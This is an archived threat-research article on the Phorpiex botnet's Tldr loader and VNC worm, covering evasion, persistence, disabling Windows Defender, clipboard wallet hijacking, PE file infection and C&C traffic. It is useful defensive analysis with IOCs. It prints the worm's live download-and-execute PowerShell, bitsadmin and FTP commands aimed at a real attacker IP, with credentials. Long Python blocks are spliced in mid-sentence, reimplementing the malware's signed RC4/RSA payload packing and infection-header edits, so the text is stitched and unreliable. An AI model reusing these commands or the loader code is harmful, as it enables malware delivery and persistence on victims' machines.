{
	"id": "a412c7d0-1694-40ee-967f-4d5b91cbeae7",
	"created_at": "2026-04-06T01:30:40.458504Z",
	"updated_at": "2026-04-10T13:12:19.319405Z",
	"deleted_at": null,
	"sha1_hash": "9773519a92d2dac0491f505f37e9b238405118b9",
	"title": "Phorpiex Arsenal: Part I",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 113245,
	"plain_text": "Phorpiex Arsenal: Part I\r\nBy etal\r\nPublished: 2020-01-27 · Archived: 2026-04-06 00:49:22 UTC\r\nThe Phorpiex botnet currently consists of more than 1,000,000 infected Windows computers. In our previous publications,\r\nwe wrote about the botnet architecture, its command and control infrastructure, and monetization methods:\r\nPhorpiex Breakdown\r\nIn the Footsteps of a Sextortion Campaign\r\nIn this article, we outline the technical details for implementing this botnet’s malicious modules.\r\nThe core part of the Phorpiex botnet is a loader named Tldr. It is responsible for loading additional malicious modules and\r\nother malware to the infected computers. Each module is a separate Windows executable. Usually, Phorpiex modules are\r\nvery small and simple. The malware configuration, that usually includes addresses of the C\u0026C servers, crypto-currency\r\nwallets, and URLs to download malicious payloads, is hardcoded to the malware executables. If it’s necessary to update the\r\nconfiguration, the botnet operators just load a new module to the infected machines. In addition, the modules are updated\r\nfrequently with minor changes. During 2019, we observed the following types of modules:\r\nLoader Phorpiex Tldr.\r\nVNC Worm Module.\r\nNetBIOS Worm Module.\r\nXMRig Silent Miner.\r\nSpam Module: Self-spreading and Sextortion\r\nAuxiliary modules (tiny geo-targeted loaders, and clean-up modules).\r\nWe should emphasize that 3 of these modules (Tldr, VNC Worm, and NetBIOS Worm) have functionality that allow the\r\nmalware to spread itself. For example, Tldr has the functionality of a file-infecting virus and is able to infect other files;\r\nVNC Worm connects to VNC servers with weak passwords and tries to infect them by simulating user input. 
This explains why the botnet is so prevalent.\r\nIn this report, we describe two of the Phorpiex modules in detail:\r\nLoader Phorpiex Tldr.\r\nVNC Worm Module.\r\nPhorpiex Tldr\r\nTldr (probably short for “TrikLoader”) is one of the key parts of the Phorpiex botnet infrastructure.\r\nFigure 1 – Phorpiex Tldr PDB filename\r\nWhen we first discovered this malware, we could not identify it or understand its affiliation with the botnet. However, its binary code, mutex names, and sandbox evasion techniques are evidence that it was developed by the same group of cybercriminals as the Phorpiex Trik IRC bot. We also found several intersections between the Trik and Tldr C\u0026C servers.\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 1 of 17\n\nWe noticed a large number of Phorpiex Tldr versions, each with different functionality. Our focus is on the features they have in common, paying special attention to the new functions added in the latest version (from July 2019). As stated previously, the main purpose of Tldr is to download and execute other modules and malware on infected computers. However, this is not its only functionality. Tldr is also capable of self-spreading, as it can behave like a worm or a file-infecting virus and infect other software.\r\nFigure 2 – Phorpiex Tldr timeline\r\nEvasion techniques\r\nPhorpiex Tldr uses simple sandbox evasion techniques. 
When started, it calls the GetModuleHandle() API function to check whether one of the following modules is loaded in its process:\r\nSBIEDLL.DLL\r\nSBIEDLLX.DLL\r\nWPESPY.DLL\r\nDIR_WATCH.DLL\r\nAPI_LOG.DLL\r\nPSTOREC.DLL\r\nThen, it enumerates the running processes and checks whether a process filename is one of the following:\r\nVBOXSERVICE.EXE\r\nVBOXTRAY.EXE\r\nVMTOOLSD.EXE\r\nVMWARETRAY.EXE\r\nVMWAREUSER\r\nVMSRVC.EXE\r\nVMUSRVC.EXE\r\nPRL_TOOLS.EXE\r\nXENSERVICE.EXE\r\nAn older version of Tldr (TldrV3, May 2018) also checks for these processes:\r\npython.exe\r\npythonw.exe\r\nprl_cc.exe\r\nvboxservice.exe\r\nvboxcontrol.exe\r\ntpautoconnsvc.exe\r\nFinally, Tldr calls the IsDebuggerPresent() API function to check whether the malware is being debugged.\r\nIf any of these checks fails, Tldr stops execution.\r\nInitialization\r\nThe initialization step is very similar to that of the Phorpiex Trik.\r\nTo prevent multiple instances of Phorpiex Tldr from running, it creates a mutex with a specific hardcoded name. Older versions used a mutex name containing the version number, for example “TldrV3”. In the latest version, the mutex name differs for each campaign. Usually it consists of several digits, for example “6486894”.\r\nFigure 3 – Mutex names used by different versions of Tldr.\r\nThe next step is the same for all Phorpiex samples: deleting the “:Zone.Identifier” alternate data stream. 
This removes the mark-of-the-web that records the file as having been downloaded from an untrusted zone.\r\nIn addition, the version from July 2019 (Tldr v5.0) acquires the debug privilege (SeDebugPrivilege):\r\nFigure 4 – Tldr acquiring debug privilege in the version from July 2019\r\nPersistence\r\nTldr copies itself to the following folders:\r\n%windir%\r\n%userprofile%\r\n%systemdrive% (only the version from July 2019)\r\n%temp%\r\nFor Phorpiex Tldr V3, the choice of path and filename is almost identical to the procedure used by Phorpiex Trik. Tldr creates a subfolder with a hardcoded name that starts with “T-” (in Phorpiex Trik, names started with “M-”) under these paths. Then the malware copies its executable to the created folder under a hardcoded filename. For example:\r\nC:\\WINDOWS\\T-9759504507674060850740\\winsvc.exe\r\nUnlike Phorpiex Tldr v3, the newer version sets up persistence only if its own filename does not contain the substring “sys”, that is, when it is not already running from an installed copy. It then uses a subfolder name generated from random digits and a filename that starts with “sys” followed by 4 random letters:\r\nFigure 5 – Generating the filename for setting up persistence\r\nTherefore, a new filename looks like this:\r\nC:\\WINDOWS\\2813528135\\sysjekp.exe\r\nPhorpiex Tldr sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM on both the created file and the subfolder.\r\nThen, the malware sets up registry autorun entries for each created copy under the following keys:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nTldr creates a new registry value with a hardcoded name. 
In the researched sample, this name is “Windows Operating System”:\r\nFigure 6 – Phorpiex Tldr autorun registry value\r\nIn addition, it adds a firewall exception by creating a new value under the registry key:\r\nSYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\L\r\nFigure 7 – Phorpiex Tldr firewall exception\r\nBypassing Windows Security\r\nThe version of Phorpiex Tldr from July 2019 (Tldr v5) disables Windows security features such as Windows Defender, Security Center notifications and System Restore by setting the following registry values:\r\nKey: Value(s)\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender: “DisableAntiSpyware” = 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection: “DisableBehaviorMonitoring” = 1, “DisableOnAccessProtection” = 1, “DisableScanOnRealtimeEnable” = 1\r\nHKLM\\SOFTWARE\\Microsoft\\Security Center and HKLM\\SOFTWARE\\Microsoft\\Security Center\\Svc: “AntiVirusOverride” = 1, “UpdatesOverride” = 1, “FirewallOverride” = 1, “AntiVirusDisableNotify” = 1, “UpdatesDisableNotify” = 1, “AutoUpdateDisableNotify” = 1, “FirewallDisableNotify” = 1\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore: “DisableSR” = 1\r\nTable 1 – Registry values modified by Tldr v5.\r\nOlder versions of Tldr only set DisableAntiSpyware.\r\nMain functionality\r\nFor each malicious activity, Phorpiex Tldr creates a separate thread.\r\nCrypto Clipper Thread\r\nAlmost all samples contain functionality for stealing crypto-currency. 
This is done by replacing a crypto-currency wallet address found in the clipboard of the infected system with one of the attackers’ addresses.\r\nIn an infinite loop, every 200 milliseconds, the malware queries the clipboard data by calling the API functions OpenClipboard(0) and GetClipboardData(CF_TEXT).\r\nTo determine whether the clipboard contains a crypto-wallet address, Phorpiex Tldr performs several checks:\r\nThe first character is one of: 1, 3, q, 2, X, D, 0, L, 4, P, t, z, G, U, E;\r\nThe clipboard text length is between 25 and 45 characters, exactly 9 characters, or between 90 and 115 characters;\r\nThe clipboard data does not contain the letters O (0x4F), I (0x49) or l (0x6C) (characters that the Base58 alphabet used by Bitcoin-style addresses omits);\r\nThe clipboard data contains only digits and letters.\r\nIf any of the checks fails, the clipboard remains unchanged. Otherwise, it determines the type of crypto-currency wallet address and replaces it with one of the hardcoded values. Phorpiex Tldr determines the exact blockchain by the first character of the clipboard data:\r\nFigure 8 – Crypto-currency wallets used by Phorpiex.\r\nThe following crypto-currencies are supported by Phorpiex:\r\nBitcoin\r\nBitcoin Cash\r\nEthereum\r\nDASH\r\nDogecoin\r\nLitecoin\r\nMonero\r\nZcash\r\nThe Crypto Clipper also handles Perfect Money wallets (Gold, USD, EUR):\r\nFigure 9 – Perfect Money wallets used by Phorpiex.\r\nFinally, the new data is written back to the clipboard by calling SetClipboardData(CF_TEXT, new_value).\r\nSelf-spreading Thread\r\nIn this thread, the functionality of a file worm is implemented.\r\nIn an infinite loop with a delay of 2 seconds, Tldr enumerates the available drives using GetLogicalDrives. 
It reads the “NoDrives” value of the registry key “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer” and excludes from the enumeration the drives hidden by the NoDrives Windows Explorer policy.\r\nThen, Tldr selects only removable and remote drives. On each selected drive, it creates a folder named “__” and sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM on the created folder to make it invisible in Explorer by default.\r\nThe malware copies itself to this folder under a hardcoded name (“DriveMgr.exe” in our sample). Tldr acquires the volume name of the selected drive. Then it creates a shortcut named “{volume_name}.lnk” in the root folder of the selected drive with the target:\r\n%windir%\\system32\\cmd.exe /c start __ \u0026 __\\DriveMgr.exe \u0026 exit\r\nThen Tldr moves all folders from the root path of the selected drive into the folder “__”, so the shortcut named after the volume is the only item the user sees in the drive root; opening it both shows the moved folders (start __) and runs the malware. It also deletes all files in the root path with the following extensions:\r\n*.lnk, *.vbs, *.bat, *.js, *.scr, *.com, *.jse, *.cmd, *.pif, *.jar, *.dll, *.vbe, *.inf\r\nFigure 10 – Extensions of files deleted by Tldr on removable drives.\r\nThe reason for this may be to disable all other worms that reside on the same removable drive.\r\nAs we can see, this behavior is the same as for other worms that spread via removable drives.\r\nHowever, in Tldr v5.0, new functionality was introduced that allows the malware to function as a file-infecting virus and infect other executables. 
Earlier, Phorpiex used a separate module to infect other software.\r\nThe malware scans all folders on removable and remote drives and infects every .exe file that is not yet infected.\r\nTo infect a PE file, Tldr performs the following modifications. It increments NumberOfSections in the PE file header and sets the header’s TimeDateStamp to the value 0x0000DEAD:\r\nFigure 11 – Timestamp signature used by Tldr to mark the infected files\r\nThe value 0x0000DEAD in the TimeDateStamp is also used by the malware to detect whether a file is already infected. As a Unix time, 0x0000DEAD (57005 seconds) corresponds to 1970-01-01 15:50:05, so infected samples can easily be found on VirusTotal with this query:\r\npets:1970-01-01T15:50:05\r\nTldr also creates a new code section named “.zero” and copies the malicious payload there. The entry point address is changed to point to the beginning of the created section, and the SizeOfImage value of the header is increased by the length of the added section. The malware does not recalculate the PE checksum; it is simply reset to 0.\r\nFigure 12 – Comparison of original and infected files\r\nTo return to the original entry point afterwards, the malware writes the original entry point’s relative address into the code of the main injected function:\r\nFigure 13 – Comparison of the same function in the template and infected sample\r\nTldr uses the placeholder value 0xCCCCCCCC to find the location in the template function where the original entry point address should be placed:\r\nFigure 14 – Setting the address of entry point in an infected sample\r\nMalicious Shellcode\r\nThe shellcode inserted into infected files consists of several functions with position-independent code. 
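The header marks described above (TimeDateStamp 0x0000DEAD, an appended section named .zero that holds the new entry point, NumberOfSections incremented, SizeOfImage grown, CheckSum zeroed) are enough to triage a suspect executable offline. The following Python is an added example written for this page, not code from the Check Point report or from the malware: it builds a constructed minimal PE32 header, applies the same header edits to a copy as a test fixture (it appends an empty section and injects no code), and then checks both copies. Real samples should go through a full PE library; the hand-rolled parser here handles PE32 only.

```python
import struct
from datetime import datetime, timezone

TLDR_TIMESTAMP = 0x0000DEAD          # TimeDateStamp Tldr writes into infected files
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40
OPT_ENTRY_POINT, OPT_SIZE_OF_IMAGE, OPT_CHECKSUM = 16, 56, 64   # IMAGE_OPTIONAL_HEADER32 offsets
SECTION_FMT = '<8sIIIIIIHHI'        # IMAGE_SECTION_HEADER


def parse_pe(data):
    '''Minimal PE32 header parser (enough for the checks below; no PE32+ support).'''
    if data[:2] != b'MZ':
        raise ValueError('not an MZ executable')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE' + bytes(2):
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4
    nsections, timestamp = struct.unpack_from('<HI', data, coff + 2)
    opt_size = struct.unpack_from('<H', data, coff + 16)[0]
    opt = coff + COFF_HEADER_SIZE
    if struct.unpack_from('<H', data, opt)[0] != 0x10B:
        raise ValueError('only PE32 is handled in this example')
    entry = struct.unpack_from('<I', data, opt + OPT_ENTRY_POINT)[0]
    size_of_image = struct.unpack_from('<I', data, opt + OPT_SIZE_OF_IMAGE)[0]
    checksum = struct.unpack_from('<I', data, opt + OPT_CHECKSUM)[0]
    sec_table = opt + opt_size
    sections = []
    for i in range(nsections):
        off = sec_table + i * SECTION_HEADER_SIZE
        name = data[off:off + 8].rstrip(bytes(1)).decode('ascii', 'replace')
        vsize, vaddr = struct.unpack_from('<II', data, off + 8)
        sections.append((name, vaddr, vsize))
    return {'coff': coff, 'opt': opt, 'sec_table': sec_table, 'nsections': nsections,
            'timestamp': timestamp, 'entry': entry, 'size_of_image': size_of_image,
            'checksum': checksum, 'sections': sections}


def tldr_infection_indicators(data):
    '''Each mark the report describes, evaluated separately.'''
    pe = parse_pe(data)
    name, va, vsize = pe['sections'][-1]
    return {
        'timestamp_is_dead': pe['timestamp'] == TLDR_TIMESTAMP,
        'last_section_is_zero': name == '.zero',
        'entry_in_last_section': va <= pe['entry'] < va + vsize,
        'checksum_zeroed': pe['checksum'] == 0,
    }


def looks_infected(data):
    '''Tldr keys only on the timestamp; require a structural mark too to avoid a coincidental match.'''
    ind = tldr_infection_indicators(data)
    return ind['timestamp_is_dead'] and (ind['last_section_is_zero'] or ind['entry_in_last_section'])


def vt_pets_query():
    '''The VirusTotal pets: query for the marker timestamp, derived from the value rather than typed.'''
    return 'pets:' + datetime.fromtimestamp(TLDR_TIMESTAMP, timezone.utc).strftime('%Y-%m-%dT%H:%M:%S')


def build_clean_pe():
    '''Constructed minimal PE32 (not a real binary): one .text section with the entry point inside it.'''
    opt_size = 0xE0
    dos = b'MZ' + bytes(0x3A) + struct.pack('<I', 0x40)                      # e_lfanew = 0x40
    coff = struct.pack('<HHIIIHH', 0x14C, 1, 0x5D2477D8, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into('<H', opt, 0, 0x10B)                                     # PE32 magic
    struct.pack_into('<I', opt, OPT_ENTRY_POINT, 0x1010)
    struct.pack_into('<III', opt, 28, 0x400000, 0x1000, 0x200)                # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into('<II', opt, OPT_SIZE_OF_IMAGE, 0x2000, 0x200)            # SizeOfImage, SizeOfHeaders
    struct.pack_into('<I', opt, OPT_CHECKSUM, 0x1234)
    text = struct.pack(SECTION_FMT, b'.text', 0x800, 0x1000, 0x800, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b'PE' + bytes(2) + coff + bytes(opt) + text).ljust(0x200, bytes(1))
    return headers + bytes(0x800)


def apply_tldr_marks(data, payload_len=0x200):
    '''Test fixture only: apply the header edits the report describes to a copy and
    append an empty section (no code is injected, so the result does nothing when run).'''
    pe = parse_pe(data)
    out = bytearray(data)
    _, last_va, last_vsize = pe['sections'][-1]
    new_va = (last_va + last_vsize + 0xFFF) & ~0xFFF                         # next section-aligned RVA
    new_hdr = pe['sec_table'] + pe['nsections'] * SECTION_HEADER_SIZE
    struct.pack_into(SECTION_FMT, out, new_hdr, b'.zero', payload_len, new_va,
                     payload_len, len(out), 0, 0, 0, 0, 0xE0000020)
    struct.pack_into('<HI', out, pe['coff'] + 2, pe['nsections'] + 1, TLDR_TIMESTAMP)
    struct.pack_into('<I', out, pe['opt'] + OPT_ENTRY_POINT, new_va)
    struct.pack_into('<I', out, pe['opt'] + OPT_SIZE_OF_IMAGE,
                     pe['size_of_image'] + ((payload_len + 0xFFF) & ~0xFFF))
    struct.pack_into('<I', out, pe['opt'] + OPT_CHECKSUM, 0)
    return bytes(out) + bytes(payload_len)
```

Tldr itself treats the timestamp alone as the infected marker; the detector additionally requires the .zero section or the relocated entry point, since 0x0000DEAD could in principle appear in an unrelated build. Running looks_infected() on build_clean_pe() and on apply_tldr_marks(build_clean_pe()) returns False and True respectively, and vt_pets_query() reproduces the VirusTotal query quoted above from the timestamp value.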
Position-independent here means that the functions use no absolute addresses and run correctly wherever they are placed in memory.\r\nFirst, the shellcode checks whether the file “%appdata%\\winsvcs.txt” exists. This file is created by Phorpiex Tldr. If it exists, the shellcode performs no action and simply passes control to the original entry point of the infected program. Otherwise, it downloads and executes another file from a hardcoded URL:\r\nFigure 15 – Part of the shellcode in infected sample.\r\nThe file is downloaded to a temporary file using the API function URLDownloadToFileW. The name of the temporary file is obtained using GetTempPathW and GetTempFileNameW. If the download succeeds, the shellcode deletes the “:Zone.Identifier” ADS from the file and executes it using CreateProcessW.\r\nFinally, control is passed to the original entry point of the infected program.\r\nC\u0026C Check-in Threads\r\nWhen first run, Phorpiex Tldr performs check-in HTTP requests to its C\u0026C servers, using a hardcoded list of servers:\r\nFigure 16 – Hardcoded URLs of Phorpiex C\u0026C servers.\r\nTldr creates a thread for each C\u0026C server. Before starting the threads, the malware creates an empty file “%appdata%\\winsvcs.txt”. This file is used as a flag to determine whether the malware is running for the first time; if it already exists, the threads are not created. It is the same file the infected-file shellcode checks for, which makes its presence a simple host indicator.\r\nIn each thread, the malware queries the following URL:\r\nhttp://\u003ccnc_host\u003e/t.php?new=1\r\nWe have also seen URLs of different formats in other samples. 
For example:\r\nhttp://\u003ccnc_host\u003e/tldr.php?new=1\r\nhttp://\u003ccnc_host\u003e/tldr.php?on=1\r\nhttp://\u003ccnc_host\u003e/tldr.php?new=1\u0026id=\u003crandom_number\u003e\r\nhttp://\u003ccnc_host\u003e/tldr.php?new=1\u0026on=\u003crandom_number\u003e\r\nFor the check-in requests, Phorpiex Tldr uses a specific hardcoded value for the User-Agent header. The value for the version from July 2019 is:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nThe value for older versions is:\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nThe resulting HTTP request therefore looks like the following:\r\nFigure 17 – Phorpiex C\u0026C check-in request.\r\nThe C\u0026C check-in functionality is not mandatory and is not present in all samples.\r\nMain thread\r\nThe main purpose of Phorpiex Tldr is to download and execute additional malicious payloads on infected hosts. It uses several hardcoded paths (usually 4 to 8) to build the URLs for downloading files:\r\nFigure 18 – Hardcoded paths accessed at the C\u0026C server by Phorpiex Tldr.\r\nThe resulting URLs look like this:\r\nhttp://\u003ccnc_domain\u003e/1.exe\r\nhttp://\u003ccnc_domain\u003e/2.exe\r\n…\r\nFor each generated URL, the malware first checks its availability and content size using the API functions InternetOpenUrlA and HttpQueryInfoA. If the URL is available, Tldr remembers the content size for each path. If the content size is the same as the previously seen value, the URL is skipped, which avoids downloading the same payload again. If the URL is available and requested for the first time, or the content length differs from the previous value, Tldr downloads and executes it. 
The downloaded file is saved in the %temp% folder under a name generated as:\r\n“%d.exe” % random.randint(10000, 40000)\r\nFor example:\r\n%temp%\\23874.exe\r\nTldr makes 2 attempts to download a file: first using InternetOpenUrlW/InternetReadFile, then using URLDownloadToFileW if the first attempt failed.\r\nAfter downloading the file, Phorpiex Tldr deletes its “:Zone.Identifier” alternate data stream. Then it makes 2 attempts to execute the downloaded file: using CreateProcess, and ShellExecute if the first attempt failed.\r\nThe actions above are performed in an infinite loop with a random delay of 1 to 600 seconds between cycles.\r\nIt is worth noting that this loader design is very unsafe for its operators: anyone who registers a domain hardcoded in an older version of Phorpiex Tldr can deliver and execute arbitrary software on the infected hosts. However, the latest Tldr version (v5) received a significant improvement that rules out this scenario.\r\nThe new feature combines RC4 file encryption with RSA-SHA1 signature verification. The digital signature allows the malware to verify both the integrity and the authenticity of downloaded samples.\r\nThe encrypted file has a header that contains the magic bytes (“NGS!”), the length of the RSA signature, and the RSA signature that is used to verify the file. The first 16 bytes of the RSA signature are used as the RC4 decryption key. Note that this key travels in the header of the file itself, so the RC4 layer is obfuscation rather than confidentiality: anyone holding the file can decrypt the payload, and the security property comes entirely from the signature check.\r\nFigure 19 – Format of the encrypted file downloaded from the Phorpiex C\u0026C server.\r\nPhorpiex Tldr decrypts the data using the 16-byte RC4 key from the file, and then calculates the SHA1 hash of the decrypted file. To verify the digital signature, Tldr uses the 4096-bit RSA public key hardcoded into the sample.\r\nFigure 20 – Hardcoded RSA public key.\r\nIf the signature verification fails, the file is not executed. 
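To make the container format and its trust model concrete, here is an added Python example written for this page; it is not code from the report or from the malware, and it fills in details the report leaves open: the signature-length field is assumed to be a 4-byte little-endian integer, the signature is assumed to be PKCS#1 v1.5 over SHA-1, and the demo key is 512-bit so that a pure-Python RSA stays fast (the real Tldr v5 key is 4096-bit; nothing else changes with the key size). pack_container() stands in for the operator side, unpack_container() for the loader, and decrypt_without_verifying() shows why the RC4 layer on its own protects nothing.

```python
import hashlib
import hmac
import random
import struct

MAGIC = b'NGS!'
# DER prefix of DigestInfo for SHA-1 (RFC 8017, section 9.2, note 1)
SHA1_DIGESTINFO = bytes.fromhex('3021300906052b0e03021a05000414')
_rng = random.SystemRandom()


def rc4(key, data):
    '''Plain RC4: key scheduling followed by the keystream XOR.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _is_probable_prime(n, rounds=32):
    '''Miller-Rabin after trial division by small primes.'''
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        cand = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def generate_keypair(bits=512):
    '''Demo-sized RSA key pair: returns ((n, e), (n, d)).'''
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % e and n.bit_length() == bits:
            return (n, e), (n, pow(e, -1, phi))


def _emsa_pkcs1_v15_sha1(message, k):
    '''EMSA-PKCS1-v1_5 encoding of SHA-1(message) into k bytes.'''
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    return bytes([0, 1]) + bytes([0xFF]) * (k - len(t) - 3) + bytes([0]) + t


def rsa_sha1_sign(priv, message):
    n, d = priv
    k = (n.bit_length() + 7) // 8
    m = int.from_bytes(_emsa_pkcs1_v15_sha1(message, k), 'big')
    return pow(m, d, n).to_bytes(k, 'big')


def rsa_sha1_verify(pub, message, signature):
    n, e = pub
    k = (n.bit_length() + 7) // 8
    if len(signature) != k or int.from_bytes(signature, 'big') >= n:
        return False
    em = pow(int.from_bytes(signature, 'big'), e, n).to_bytes(k, 'big')
    # compare the whole re-encoded block instead of parsing the padding
    return hmac.compare_digest(em, _emsa_pkcs1_v15_sha1(message, k))


def pack_container(priv, plaintext):
    '''Operator side: sign, derive the RC4 key from the signature, prepend the header.'''
    sig = rsa_sha1_sign(priv, plaintext)
    return MAGIC + struct.pack('<I', len(sig)) + sig + rc4(sig[:16], plaintext)


def unpack_container(pub, blob):
    '''Loader side: return the verified plaintext, or raise ValueError.'''
    if blob[:4] != MAGIC:
        raise ValueError('bad magic')
    sig_len = struct.unpack_from('<I', blob, 4)[0]
    sig = blob[8:8 + sig_len]
    if sig_len < 16 or len(sig) != sig_len:
        raise ValueError('truncated signature')
    plaintext = rc4(sig[:16], blob[8 + sig_len:])
    if not rsa_sha1_verify(pub, plaintext, sig):
        raise ValueError('signature verification failed')
    return plaintext


def decrypt_without_verifying(blob):
    '''The RC4 key is the first 16 signature bytes from the header, so anyone can do this.'''
    sig_len = struct.unpack_from('<I', blob, 4)[0]
    return rc4(blob[8:24], blob[8 + sig_len:])
```

Typical use is pub, priv = generate_keypair(); blob = pack_container(priv, payload); unpack_container(pub, blob). The verifier compares the full re-encoded PKCS#1 v1.5 block with a constant-time comparison instead of parsing the padding, which is the usual way to avoid signature-forgery bugs in hand-written verifiers. A container produced with a different private key decrypts correctly (its key is in its own header) but fails the signature check; flipping one byte of the body corrupts the plaintext and also fails. Either way the loader refuses it, which is exactly the property that closes the domain-hijack hole described above.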
Only files signed with the corresponding RSA private key are therefore accepted by Phorpiex Tldr.\r\nPhorpiex VNC Worm Module\r\nOne of the modules we discovered in the Phorpiex arsenal is a malicious VNC client. It has no persistence mechanism of its own and is normally executed by Tldr each time. This tiny malware scans random IP addresses for an open VNC server port (5900) and runs a brute-force attack using a hardcoded list of passwords. The final goal of the attack is to load and execute another malware (usually Phorpiex Tldr) on the target host.\r\nThe execution of the Phorpiex VNC Worm starts with an API bombing sandbox evasion technique. It performs a large number of meaningless calls to several functions in a loop:\r\nFigure 21 – API bombing evasion technique.\r\nThe malware prevents several instances from running at once by using a mutex with a hardcoded name.\r\nThe attack itself is performed in an infinite loop. The IP addresses used for scanning are generated randomly using the rand() function seeded with the GetTickCount() result. The only filter rule is that the first octet of an address may not be 127, 172 or 192 (so, for example, the 10.0.0.0/8 private range is not excluded). 
A separate thread is created for each IP address.\r\nIf the connection to TCP port 5900 succeeds, the VNC worm starts a brute-force attack on the discovered VNC server with a list of passwords:\r\nFigure 22 – List of passwords used for the VNC brute-force attack.\r\nThe list of passwords may vary among different samples.\r\nIf the attack is successful, the result can be reported to a C\u0026C server using a URL of the following format (the URL template is hardcoded in the malware sample):\r\n“hxxp://92.63.197.153/result.php?vnc=%s|%s” % (host, password)\r\nIn the researched samples the reporting functionality is disabled even though the URL is present.\r\nFinally, the Phorpiex VNC worm executes several scripts on the victim’s machine by simulating keyboard input over the VNC protocol. First it sends Win+R to open the “Run” dialog. Then it “types” the script contents by sending the corresponding VNC key events:\r\nFigure 23 – Illustration of the attack: simulated user input using VNC commands.\r\nThe following scripts are usually executed:\r\ncmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/vnc.exe','%temp%\\48303045850.exe');Start-Process '%temp%\\48303045850.exe'\r\ncmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/vnc.exe %temp%\\49405003030.exe\u0026start %temp%\\49405003030.exe\r\ncmd.exe /c netsh firewall add allowedprogram C:\\Windows\\System32\\ftp.exe \"ok\" ENABLE\u0026netsh advfirewall firewall add rule name=\"ok\" dir=in action=allow program=\"C:\\Windows\\System32\\ftp.exe\" enable=yes\r\ncmd.exe /c \"cd %temp%\u0026@echo open 92.63.197.153\u003e\u003eftpget.txt\u0026@echo tom\u003e\u003eftpget.txt\u0026@echo hehehe\u003e\u003eftpget.txt\u0026@echo binary\u003e\u003eftpget.txt\u0026@echo get 
vnc.exe\u003e\u003eftpget.txt\u0026@echo quit\u003e\u003eftpget.txt\u0026@ftp -s:ftpget.txt\u0026@start vnc.exe\"\r\nIn this way, the Ph orpiex VNC worm forces the victim’s machine to download and execute a malicious sample over HTTP or FTP from a server controlled by the malware actors. As the script source shows, the malware uses hardcoded credentials to access the FTP server:\r\nUSER tom\r\nPASS hehehe\r\nWe observed the following locations being used for victims to download payloads:\r\nftp://tom:hehehe@92.63.197[.]153/vnc.exe\r\nftp://tom:hehehe@92.63.197[.]153/ohuh.exe\r\nhttp://92.63.197[.]153/vnc.exe\r\nhttp://92.63.197[.]153/ohuh.exe\r\nThis module was generally used by the Phorpiex botnet for self-spreading and for pushing ransomware.\r\nIOC\r\nPhorpiex Tldr\r\nMD5 Compilation Timestamp Version\r\n383498f810f0a992b964c19fc21ca398 May 28 12:51:34 2018 Tldr v1.0\r\n11ced3ab21afbeff6ce70d1f4b6e5fc7 Jun 14 00:31:27 2018 Tldr v2.0\r\n8e12c260a0cdc4e25a39ec026214bf99 Oct 25 00:08:30 2018 Tldr v3.0\r\n51d0c623f263260bd52f9ebeb00dae00 Jul 09 13:56:40 2019 Tldr v4\r\n3282f6c806a89359ec94f287cf6c699c Jul 18 01:08:07 2019 Tldr v5\r\nPhorpiex Tldr C\u0026C IPs and domains:\r\nDomain or IP\r\n185.176.27.132\r\n193.32.161.69\r\n193.32.161.73\r\n193.32.161.77\r\n92.63.197.153\r\n92.63.197.38\r\n92.63.197.59\r\n92.63.197.60\r\n94.156.133.65\r\naiiaiafrzrueuedur.ru\r\nfafhoafouehfuh.su\r\nffoeefsheuesihfo.ru\r\nosheoufhusheoghuesd.ru\r\nouhfuosuoosrhzfzr.ru\r\nslpsrgpsrhojifdij.ru\r\nunokaoeojoejfghr.ru\r\nb0t.to\r\nthaus.to\r\nthaus.top\r\nURLs related to Phorpiex 
